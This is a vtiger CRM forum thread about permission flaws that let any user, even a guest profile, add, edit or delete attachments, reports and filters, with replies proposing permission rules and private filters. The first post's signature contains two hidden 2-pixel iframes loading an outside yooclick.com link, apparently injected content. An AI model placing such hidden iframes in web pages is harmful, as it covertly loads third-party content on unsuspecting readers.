Seriuous security feature- attachment, reports, filters

Attachments
Anyone, even the guest profile, even without insert/delete permission on modules, can insert and delete attachments, even those inserted by other users.

Reports
Anyone, even the guest profile, even without insert/delete/edit permission on modules, can insert, delete and edit reports, even those inserted by other users.

Filters
Anyone, even the guest profile, even without insert/delete/edit permission on modules, can insert, delete and edit filters, even those inserted by other users.

I hope someone will tell me that there's already an easy way to avoid these problems without doing a feature request <!-- s:wink: --><img src="{SMILIES_PATH}/icon_wink.gif" alt=":wink:" title="Wink" /><!-- s:wink: -->
Thank you <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;
«1

Comments

  • 16 Comments sorted by Votes Date Added
  • did you upgrade to v5.0.3?
  • sorry, i have to upgrade my signature <!-- s:) --><img src="{smilies_path}/icon_smile.gif" alt=":)" title="smile" /><!-- s:) -->
    yes, we're running the 5.0.3 versione.
    but i've also tested all on en.vtiger.com and it 'works' the same way.
  • i'm having a similar issue: the profiles appear with everything checked, the only way to stop it is to erase the module altogether... it started when updating from 5.0.1 to 5.0.3
  • dear vinontiger,
    attachments
    anyone, even the guest profile, even without insert/delete permission on modules, can insert and delete attachments, even those inserted by other users.

    as we cann't set permission for attachment, all crm-users has permission to do file attachement. however we can disable the delete permission for file attachement, if the user has only the view permission for particular record.
    reports
    anyone, even the guest profile, even without insert/delete/edit permission on modules, can insert, delete and edit reports, even those inserted by other users.

    if the user does not have permission for particular module, he cann't create/edit/view/delete reports for that module. for eg. if potentials module is not permitted for the user smith, smith can not create/edit/view/delete potentials related reports. but the following functionalties need to be implemented.
      1) if only view permission given for particular module say potentials, create/edit/delete permission for potentials-reports should be disabled. 2) if create/edit and view permission given, delete permission should be disabled. 3) if delete and view permission given, create permission should be disabled[/list:u]
    filters
    anyone, even the guest profile, even without insert/delete/edit permission on modules, can insert, delete and edit filters, even those inserted by other users.

    as the customview-filter is not specific to any module/user, it can be edited/deleted by any crm-user. however we can provide an option for do not edit/delete. if an user create a customview filter and enable this option, this filter can not be deleted/edited by other users.

    this is my opinion. kindly give yours.

    thanks & regards,
    minnie.
  • attachments
    dear vinontiger,
    attachments
    anyone, even the guest profile, even without insert/delete permission on modules, can insert and delete attachments, even those inserted by other users.

    as we cann't set permission for attachment, all crm-users has permission to do file attachement. however we can disable the delete permission for file attachement, if the user has only the view permission for particular record.

    if enyone can add an attachment is a minor problem.
    the problem is that now vtiger doesn't work as you said. if a user has only the view permission on a specific module he can still delete any attachment about that module. please try it.

    reports
    anyone, even the guest profile, even without insert/delete/edit permission on modules, can insert, delete and edit reports, even those inserted by other users.
    if the user does not have permission for particular module, he cann't create/edit/view/delete reports for that module. for eg. if potentials module is not permitted for the user smith, smith can not create/edit/view/delete potentials related reports. but the following functionalties need to be implemented.
      1) if only view permission given for particular module say potentials, create/edit/delete permission for potentials-reports should be disabled. 2) if create/edit and view permission given, delete permission should be disabled. 3) if delete and view permission given, create permission should be disabled[/list:u]

    i agree with you on these rules <!-- s:) --><img src="{smilies_path}/icon_smile.gif" alt=":)" title="smile" /><!-- s:) -->
    but there is a problem now: if a user has only the view permission on a module, he can edit the report, please try it.
    filters
    anyone, even the guest profile, even without insert/delete/edit permission on modules, can insert, delete and edit filters, even those inserted by other users.
    as the customview-filter is not specific to any module/user, it can be edited/deleted by any crm-user. however we can provide an option for do not edit/delete. if an user create a customview filter and enable this option, this filter can not be deleted/edited by other users.

    this is my opinion. kindly give yours.

    thanks & regards,
    minnie.

    *now* any user, without regard on which kind of permission has, can edit/delete or add any filter, even the default ones that come with the installation.

    i believe that only the administrator or a specific profile should be able to add/edit/delete filters.
    when a user create e filter it is visible to anyone.
    let's imagine what kind of confusion if any user really will start to do so: suddenly the combo filters will have a lot of filters.
    it would be advisable to add an option like that:
    1) add/edit/delete filters is bound to specific profile
    2) the filter should have an option public/private or, better, to relate the view to groups/roles, so every users/groups has only the filter about own interest in the combo filter.
    3) it should be possible to define the order of filters visualization, because now they are ordered in the combo filter in the same order in which you add them.
    thank you
  • was there ever any resolution to the filter issue? i think filters have to have a public/private option.

    we have 65 potential users, it's going to be a mess showing all filters all the time.
  • it also appears that 'my sites' are shared between all users. again this is going to be a mess.
  • i can confirm that this feature request is very good.

    there is ticket:

    <!-- m --><a class="postlink" href="http://trac.vtiger.com/cgi-bin/trac.cgi/ticket/4083">http://trac.vtiger.com/cgi-bin/trac.cgi/ticket/4083</a><!-- m -->

    regards,

    ln
  • i'm looking at the tables now, i don't see anything tying the creator to the filter, it appears a new filter_owner field is going to be needed to initially keep custom fields private to their creator/owner.

    i'd like to at least keep the filters private for the moment, expand into the permissions system later.
  • your users are useing mainly one filter ore more than one ?

    because if only/mainly one, so will be better think about, how setup diferent filters for diferent users/groups as default in first step....

    regards,

    ln
Sign In or Register to comment.